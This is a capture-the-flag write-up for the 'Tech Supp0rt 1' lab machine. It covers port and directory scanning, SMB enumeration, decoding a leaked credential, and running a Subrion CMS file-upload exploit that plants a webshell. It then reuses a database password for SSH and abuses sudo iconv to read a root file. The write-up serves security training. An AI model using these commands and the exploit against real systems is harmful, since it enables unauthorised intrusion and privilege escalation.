
████████╗███████╗ ██████╗██╗  ██╗    ███████╗██╗   ██╗██████╗ ██████╗  ██████╗ ██████╗ ████████╗     ██╗
╚══██╔══╝██╔════╝██╔════╝██║  ██║    ██╔════╝██║   ██║██╔══██╗██╔══██╗██╔═══██╗██╔══██╗╚══██╔══╝    ███║
   ██║   █████╗  ██║     ███████║    ███████╗██║   ██║██████╔╝██████╔╝██║   ██║██████╔╝   ██║       ╚██║
   ██║   ██╔══╝  ██║     ██╔══██║    ╚════██║██║   ██║██╔═══╝ ██╔═══╝ ██║   ██║██╔══██╗   ██║        ██║
   ██║   ███████╗╚██████╗██║  ██║    ███████║╚██████╔╝██║     ██║     ╚██████╔╝██║  ██║   ██║        ██║
   ╚═╝   ╚══════╝ ╚═════╝╚═╝  ╚═╝    ╚══════╝ ╚═════╝ ╚═╝     ╚═╝      ╚═════╝ ╚═╝  ╚═╝   ╚═╝        ╚═╝
                                                                                                        

[NMAP SCAN]

nmap -T4 -sV -p- [machine IP]
Starting Nmap 7.80 ( https://nmap.org ) at 2022-04-26 23:12 EDT
Stats: 0:00:27 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 75.00% done; ETC: 23:12 (0:00:04 remaining)
Nmap scan report for 10.10.52.191
Host is up (0.21s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: Host: TECHSUPPORT; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Navigating to http://[machine IP] shows us an Apache2 default page. Perhaps we can find other directories with brute force:

[GOBUSTER RESULTS]

gobuster -u [machine IP] -w /home/techtyte/thm/dirbcommon.txt

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://techsupport.thm/
[+] Threads      : 10
[+] Wordlist     : /home/techtyte/thm/dirbcommon.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout      : 10s
=====================================================
2022/04/26 23:49:38 Starting gobuster
=====================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/index.html (Status: 200)
/phpinfo.php (Status: 200)
/server-status (Status: 403)
/test (Status: 301)
/wordpress (Status: 301)
=====================================================
2022/04/26 23:51:15 Finished
=====================================================

Looking at /test had me like... Bonzai buddy, is that you? xD
I pressed ctrl-u to view the source code and I didn't find much.

/wordpress gives us an error page. Clicking around the links at the top lead nowhere.

Let's try gobuster again:

gobuster -u techsupport.thm/wordpress -w /home/techtyte/thm/dirbcommon.txt

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://techsupport.thm/wordpress/
[+] Threads      : 10
[+] Wordlist     : /home/techtyte/thm/dirbcommon.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout      : 10s
=====================================================
2022/04/26 23:57:47 Starting gobuster
=====================================================
/.htaccess (Status: 403)
/.hta (Status: 403)
/.htpasswd (Status: 403)
/index.php (Status: 200)
/wp-admin (Status: 301)
/wp-content (Status: 301)
/wp-includes (Status: 301)
=====================================================
2022/04/26 23:59:28 Finished
=====================================================


And look into Samba:

[SMB]

techtyte@Discordia:~/Downloads$ smbclient -L [machine IP]
Enter WORKGROUP\techtyte's password: 

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	websvr          Disk      
	IPC$            IPC       IPC Service (TechSupport server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
techtyte@Discordia:~/Downloads$ smbclient //[machine IP]/websvr
Enter WORKGROUP\techtyte's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat May 29 03:17:38 2021
  ..                                  D        0  Sat May 29 03:03:47 2021
  enter.txt                           N      273  Sat May 29 03:17:38 2021

		8460484 blocks of size 1024. 5698604 blocks available
smb: \> get enter.txt
getting file \enter.txt of size 273 as enter.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \> 

We find a file called enter.txt:

cat enter.txt 
GOALS
=====
1)Make fake popup and host it online on Digital Ocean server
2)Fix subrion site, /subrion doesn't work, edit from panel
3)Edit wordpress website

IMP
===
Subrion creds
|->admin:7sKvntXdPEJaxazce9PXi24zaFrLiKWCk [cooked with magical formula]
Wordpress creds
|->


"Cooked with magical formula" makes me think of the Magic option from cyberchef. Let's give it a shot.
>Go to cyberchef.io
>Paste the string following "admin:" into the Input
>Search under "Operations" for "Magic" and drag it into the Recipe space.

The first result tells us the recipe:
From_Base58('123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz',false)
From_Base32('A-Z2-7=',false)
From_Base64('A-Za-z0-9+/=',true)

And gives us the password.

/wordpress/wp-admin is a login page, however the credentials do not work there. We need to find the subrion login.

Even though /subrion/ does not work, let's see if GoBuster can find anything beyond that.

Notes: It will tell you of a Wildcard response being found, and will spit out false positives if you run it with the -fw switch. Since the false positives
only appear to be codes 301 and 302, I tried to work around that and only specified status codes besides those two.

gobuster -u techsupport.thm/subrion/ -w /home/techtyte/thm/dirbcommon.txt -s 200,204,307,403

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://techsupport.thm/subrion/
[+] Threads      : 10
[+] Wordlist     : /home/techtyte/thm/dirbcommon.txt
[+] Status codes : 200,204,307,403
[+] Timeout      : 10s
=====================================================
2022/05/14 15:32:00 Starting gobuster
=====================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/favicon.ico (Status: 200)
/robots.txt (Status: 200)
/sitemap.xml (Status: 200)
/updates (Status: 403)
=====================================================
2022/05/14 15:33:38 Finished
=====================================================

/robots.txt reads:

User-agent: *
Disallow: /backup/
Disallow: /cron/?
Disallow: /front/
Disallow: /install/
Disallow: /panel/
Disallow: /tmp/
Disallow: /updates/

/panel/ is the login page for subrion! 
On this page, we also discover that they a running Subrion CMS v4.2.1

I did a quick search and came across this exploit: https://www.exploit-db.com/exploits/49876 - File Upload Bypass to RCE
I saved it to my system and tried running it (make sure to specify the credentials)

python3 subrion.py -u http://techsupport.thm/subrion/panel/ -l admin -p (xx Real Password Here xx)

[+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422 

[+] Trying to connect to: http://techsupport.thm/subrion/panel/
[+] Success!
[+] Got CSRF token: hN6NlZSvZicSHnvPpr7d4BLNpQ50FecEfpJPp4r9
[+] Trying to log in...
[+] Login Successful!

[+] Generating random name for Webshell...
[+] Generated webshell name: pvmgjdgzghzmnmc

[+] Trying to Upload Webshell..
[+] Upload Success... Webshell path: http://techsupport.thm/subrion/panel/uploads/pvmgjdgzghzmnmc.phar 

$ 

We get a shell as www-data, and are "kind of" stuck in /var/www/html/subrion/uploads
However, we can traverse just fine using ls ..

$ ls ../../../../../../home
scamsite

$ ls ../../../../../../home/scamsite
websvr

$ ls ../../../../../../home/scamsite/websvr   
enter.txt

There's the enter.txt we found earlier. Scamsite seems to be the only user on the system.

wp-config gives some database credentials:

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wpdb' );

/** MySQL database username */
define( 'DB_USER', 'support' );

/** MySQL database password */
define( 'DB_PASSWORD', '(xx Real Password Here xx' );


I decided to try this password elsewhere.

ssh scamsite@[machine IP] - and we are successful!

As per usual, checking sudo privileges:

User scamsite may run the following commands on TechSupport:
    (ALL) NOPASSWD: /usr/bin/iconv

GTFObins provides us with this:

Sudo

If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

    LFILE=file_to_read
    ./iconv -f 8859_1 -t 8859_1 "$LFILE"

We have to slightly modify this to make it work:

First, type in:
LFILE=/root/root.txt

Next, type:
sudo /usr/bin/iconv -f 8859_1 -t 8859_1 "$LFILE"

Congrats!! 
